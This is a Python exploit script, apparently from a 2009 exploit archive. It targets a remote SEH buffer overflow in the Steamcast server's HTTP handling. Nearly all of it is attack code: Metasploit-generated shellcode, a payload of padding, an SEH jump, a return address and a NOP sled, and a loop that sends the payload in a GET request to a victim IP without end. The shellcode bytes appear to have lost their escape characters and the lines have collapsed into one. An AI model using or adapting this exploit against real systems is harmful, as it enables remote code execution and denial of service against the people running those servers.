steamcasthttp-overflow.txt
Posted on 14 April 2009
#!/usr/bin/python #[*] Usage : steamcast.py [victime_ip] #[*] Bug : Steamcast(HTTP Request) Remote Buffer Overflow Exploit (SEH) [1] #[*] Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln. #[*] Tested on : Xp sp2 (fr) #[*] Exploited by : His0k4 #[*] Greetings : All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com #[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D #[*] Translate by Cyb3r-1st : esse7 embe7 embou :p #Note : The problem is that we need to find a dll wich its not compiled with GS, in my case i founded idmmbc its a loaded dll of internet download manager so try to find an unsafe dll. import sys, socket import struct host = sys.argv[1] port = 8000 # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com shellcode=( "x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xc6" "x90xb4x70x83xebxfcxe2xf4x3ax78xf0x70xc6x90x3fx35" "xfax1bxc8x75xbex91x5bxfbx89x88x3fx2fxe6x91x5fx39" "x4dxa4x3fx71x28xa1x74xe9x6ax14x74x04xc1x51x7ex7d" "xc7x52x5fx84xfdxc4x90x74xb3x75x3fx2fxe2x91x5fx16" "x4dx9cxffxfbx99x8cxb5x9bx4dx8cx3fx71x2dx19xe8x54" "xc2x53x85xb0xa2x1bxf4x40x43x50xccx7cx4dxd0xb8xfb" "xb6x8cx19xfbxaex98x5fx79x4dx10x04x70xc6x90x3fx18" "xfaxcfx85x86xa6xc6x3dx88x45x50xcfx20xaex60x3ex74" "x99xf8x2cx8ex4cx9exe3x8fx21xf3xd5x1cxa5x90xb4x70") exploit = "x41"*1003 + "xEBx06x90x90" + "xDBx27x02x10" + "x90"*20 + shellcode while 1: s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) head = "GET / HTTP/1.1 " head += "Host: "+host+" " head += exploit+" " head += " " s.send(head)
